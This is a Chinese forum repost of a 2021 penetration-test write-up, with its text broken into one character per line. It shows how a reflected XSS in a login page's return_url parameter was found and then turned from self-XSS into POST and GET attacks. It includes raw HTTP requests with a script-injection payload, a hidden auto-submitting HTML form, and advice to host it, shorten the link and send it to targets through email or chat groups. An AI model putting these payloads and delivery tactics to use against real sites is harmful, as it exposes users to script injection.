论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[2069] 2021-06-25_一枚进击中的Self-XSS
文档创建者:
s7ckTeam
浏览次数:
0
最后更新:
2025-01-16
Web安全
0 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-06-25_一枚进击中的Self-XSS
一
枚
进
击
中
的
"
S
e
l
f
-
X
S
S
"
原
创
d
o
n
9
d
o
n
9
s
e
c
2
0
2
1
-
0
6
-
2
5
收
录
于
话
题
#
实
操
练
习
,
6
个
目
录
反
射
型
S
e
l
f
-
X
S
S
P
O
S
T
反
射
型
X
S
S
G
E
T
反
射
型
X
S
S
反
射
型
反
射
型
S
e
l
f
-
X
S
S
开
局
登
录
框
随
机
输
入
,
然
后
b
u
r
p
抓
包
发
现
一
枚
比
较
"
陌
生
"
的
参
数
r
e
t
u
r
n
_
u
r
l
f
u
z
z
一
波
得
到
p
a
y
l
o
a
d
即
P
O
S
T
/
m
e
m
b
e
r
s
h
i
p
_
l
o
g
i
n
.
a
s
p
H
T
T
P
/
1
.
1
H
o
s
t
:
U
s
e
r
-
A
g
e
n
t
:
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
r
e
t
u
r
n
_
u
r
l
=
&
a
c
c
o
u
n
t
=
x
&
p
a
s
s
w
o
r
d
=
x
&
l
o
g
i
n
=
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
2
0
2
1
)
<
/
s
c
r
i
p
t
>
P
O
S
T
/
m
e
m
b
e
r
s
h
i
p
_
l
o
g
i
n
.
a
s
p
H
T
T
P
/
1
.
1
H
o
s
t
:
U
s
e
r
-
A
g
e
n
t
:
响
应
如
下
成
功
x
s
s
自
己
但
总
不
能
一
枚
s
e
l
f
-
x
s
s
就
结
束
了
吧
?
P
O
S
T
-
反
射
型
反
射
型
X
S
S
F
1
2
,
查
看
源
码
U
s
e
r
-
A
g
e
n
t
:
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
r
e
t
u
r
n
_
u
r
l
=
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
2
0
2
1
)
<
/
s
c
r
i
p
t
>
&
a
c
c
o
u
n
t
=
x
&
p
a
s
s
w
o
r
d
=
x
&
l
o
g
i
n
=
构
造
p
o
s
t
表
单
x
s
s
P
o
s
t
.
h
t
m
l
:
诱
导
目
标
访
问
这
个
h
t
m
l
文
件
,
触
发
如
下
:
如
果
是
在
日
常
攻
防
演
练
中
,
可
以
将
该
h
t
m
l
部
署
在
v
p
s
,
然
后
生
成
短
链
接
后
再
进
行
投
递
,
如
:
起
一
个
w
e
b
服
务
生
成
短
链
接
然
后
模
拟
投
递
该
短
链
接
(
邮
箱
/
Q
Q
群
/
微
信
群
等
)
成
功
触
发
<
h
t
m
l
>
<
b
o
d
y
>
<
f
o
r
m
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
w
w
w
.
x
x
x
.
c
o
m
/
m
e
m
b
e
r
s
h
i
p
_
l
o
g
i
n
.
a
s
p
"
m
e
t
h
o
d
=
"
P
O
S
T
"
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
r
e
t
u
r
n
_
u
r
l
"
v
a
l
u
e
=
"
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
2
0
2
1
)
<
/
s
c
r
i
p
t
>
"
/
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
a
c
c
o
u
n
t
"
v
a
l
u
e
=
"
x
"
/
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
p
a
s
s
w
o
r
d
"
v
a
l
u
e
=
"
x
"
/
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
l
o
g
i
n
"
v
a
l
u
e
=
"
"
/
>
<
i
n
p
u
t
t
y
p
e
=
"
s
u
b
m
i
t
"
v
a
l
u
e
=
"
S
u
b
m
i
t
r
e
q
u
e
s
t
"
/
>
<
/
f
o
r
m
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
虽
然
,
针
对
P
O
S
T
型
X
S
S
的
利
用
已
经
较
为
成
熟
,
但
是
如
果
能
进
化
为
G
E
T
型
X
S
S
自
然
最
好
。
G
E
T
-
反
射
型
反
射
型
X
S
S
初
始
登
录
时
的
数
据
如
下
右
键
,
改
变
请
求
方
式
G
E
T
请
求
包
P
O
S
T
/
m
e
m
b
e
r
s
h
i
p
_
l
o
g
i
n
.
a
s
p
H
T
T
P
/
1
.
1
H
o
s
t
:
U
s
e
r
-
A
g
e
n
t
:
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
r
e
t
u
r
n
_
u
r
l
=
&
a
c
c
o
u
n
t
=
x
&
p
a
s
s
w
o
r
d
=
x
&
l
o
g
i
n
=
G
E
T
/
m
e
m
b
e
r
s
h
i
p
_
l
o
g
i
n
.
a
s
p
?
r
e
t
u
r
n
_
u
r
l
=
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
2
0
2
1
)
<
/
s
c
r
i
p
t
>
&
a
c
c
o
u
n
t
=
x
&
p
a
s
s
w
o
r
d
=
x
&
l
o
g
i
n
=
H
T
T
P
/
1
.
1
H
o
s
t
:
U
s
e
r
-
A
g
e
n
t
:
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
响
应
如
下
成
功
弹
窗
常
规
利
用
同
P
O
S
T
型
X
S
S
一
样
,
将
携
带
p
a
y
l
o
a
d
的
链
接
丢
短
链
接
在
线
生
成
网
站
然
后
将
生
成
的
链
接
投
递
即
可
,
触
发
如
下
:
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全